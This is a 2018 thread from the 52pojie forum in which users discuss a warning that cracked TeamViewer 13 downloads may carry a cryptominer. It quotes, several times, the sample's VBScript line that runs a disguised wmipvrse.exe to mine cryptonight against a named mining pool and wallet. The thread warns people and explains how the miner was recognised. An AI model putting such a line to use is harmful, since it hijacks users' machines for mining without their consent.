吾爱破解 - LCG - LSG |安卓破解|病毒分析|破解软件|www.52pojie.cn

注册[Register]

QQ登录

只需一步,快速开始

楼主: 丶小蓝丶

[转载] 你下载的TeamViewer13破解版可能有毒

undersiong 发表于 2018-8-13 17:16
使用论坛附件上传样本压缩包时必须使用压缩密码保护,压缩密码:52pojie,否则会导致论坛被杀毒软件等误报,论坛有权随时删除相关附件和帖子!
同好奇大佬是怎么看出挖矿病毒的。

发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。

lyj01-cn 发表于 2018-8-13 17:18

顶顶顶,坏人还是很多的,注意注意
返人类 发表于 2018-8-13 17:20
valueble123 发表于 2018-8-13 16:54
感觉很厉害但是看不明白,不知道楼主是怎么看出的挖矿的病毒的呢,有什么特征或者说进程名字特征呢,小白一 ...

CreateObject("WScript.Shell")WShell.Run "wmipvrse.exe --cpu-priority 2 --cpu-affinity 2 -a cryptonight -o stratum+tcp://krb.crypto-coins.club:5555 -u KjCJtxsXLAd4hUBXAUKxPSPn3L2YaAgihUUc8SQAaCfeG1QpN3kNyLyBRjRUdzmaAdYhMyoZJvUMceBuWcR3a9rnA3U4EBJ -p x"

看不出么……多么明显了……认真看啊
valueble123 发表于 2018-8-13 17:21
CreateObject("WScript.Shell")WShell.Run "wmipvrse.exe --cpu-priority 2 --cpu-affinity 2 -a crypton ...

谢谢,我研究下,哈哈 没接触过啊 所以看不出来
php.c 发表于 2018-8-13 17:24
支持楼主一个。不过teamviewer官网下的本身对个人用户就是免费的啊,为什么要找破解版?
wd1203041 发表于 2018-8-13 17:30
谢谢提醒,已加分
 楼主| 丶小蓝丶 发表于 2018-8-13 17:31
大家也可以看看这个帖子  大牛写的很详细了:一个挖矿病毒浅析
https://www.52pojie.cn/thread-753785-1-1.html
(出处: 吾爱破解论坛)
ttd_2001 发表于 2018-8-13 17:34
我最恨病毒了,当年熊猫烧香叫我损失惨重,作者才被判那么  轻。
这个如果有病毒的话,我不会用了
heroic 发表于 2018-8-13 17:39
CreateObject("WScript.Shell")WShell.Run "wmipvrse.exe --cpu-priority 2 --cpu-affinity 2 -a crypton ...

不懂的人看到的就一些字符而已,再怎么认真看还是看不懂的,懂的人当然觉得简单,你也没说是怎么看出来的啊。。。。

免费评分

小屎球 + 1 论坛禁止求脱求破,求助软件分析思路,务必在主题帖中描述清楚你的分析思路.
闲月疏云 + 2 你这也太直白了,给人留点面子啊[笑]
www.52pojie.cn + 2 + 1 热心回复!

西湖老品丶 发表于 2018-8-13 17:41
就是进来看看